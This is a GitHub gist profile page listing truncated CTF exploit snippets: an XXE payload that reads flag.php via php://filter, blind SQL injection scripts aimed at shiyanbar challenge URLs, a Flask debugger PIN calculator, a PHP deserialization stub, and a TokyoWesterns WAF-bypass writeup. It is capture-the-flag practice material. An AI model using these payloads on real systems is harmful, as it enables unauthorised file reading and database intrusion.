Skip to content

Instantly share code, notes, and snippets.

View Imtinmin's full-sized avatar
🐟
working

tinmin Imtinmin

🐟
working
View GitHub Profile
@Imtinmin
Imtinmin / README.md
Created September 25, 2020 17:15 — forked from terjanq/README.md
TokyoWesterns CTF 2020 | writeups by @terjanq

TokyoWesterns CTF 2020 | writeups by @terjanq

Urlcheck v1 (98 points, 160 solves)

The goal was to bypass WAF protection to access local resources.

app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

def valid_ip(ip):
 matches = app.re_ip.match(ip)
import javax.swing.*;
import java.awt.event.*;
import java.io.*;
import java.net.*;
import java.util.logging.*;
import java.lang.*;
public class ServerMain extends javax.swing.JFrame implements Runnable{
private JPanel panel1;
private JButton startButton;
@Imtinmin
Imtinmin / flask-pin.py
Last active November 23, 2019 08:41
flask-pin
import hashlib
from itertools import chain
import requests
probably_public_bits = [
'ctf',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.6/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
@Imtinmin
Imtinmin / 正方评教
Created November 12, 2019 05:16
评教.js
var num = [2,3,4,5,6,7,8,9,10,11,12,13,14,15,16];
for(var i=0;i<num.length;i++)
{
var opts = document.getElementById("DataGrid1__ctl"+num[i]+"_JS1").getElementsByTagName("option");
for (var j=0; j<opts.length; j++){
if (opts[j].value=="优"){
opts[j].selected=true;
}
}
}
<?php
/**
* @Created by phpstorm
* @User: tinmin
* @Date: 2019/10/18
* @Time: 下午5:11
* @Challenge: Bugku-login4
*/
$username = "admix";
@Imtinmin
Imtinmin / exp.xml
Created September 4, 2019 01:13
TokyoWesterns CTF 5th 2019 j2x2j
<?xml version="1.0"?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php" >]>
<root>
<glossary>
<title>example glossary</title>
<GlossDiv>
<title>S</title>
<GlossList>
<GlossEntry>
<ID>SGML</ID>
@Imtinmin
Imtinmin / exp.py
Created September 2, 2019 14:30
实验吧 简单的sql注入之3
import requests
url = "http://ctf5.shiyanbar.com/web/index_3.php"
def length(sql):
for i in range(50):
payload = "0' or if(length(({}))={},'1',null)='1".format(sql,i)
tmp = {
'id':payload
@Imtinmin
Imtinmin / exp.py
Last active September 1, 2019 07:46
实验吧 认真一点
import requests
import string
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
dic = string.ascii_letters + string.digits + '!_{}@~.'
def payload(sql):
return sql.replace(' ',chr(0x0a)).replace('or','oorr')
def foo():
@Imtinmin
Imtinmin / exp.php
Last active July 2, 2019 09:01
QWB-UPLOAD
<?php
//__call方法
namespace app\web\controller;
class Profile{
}
class Register{}
$a = new Register();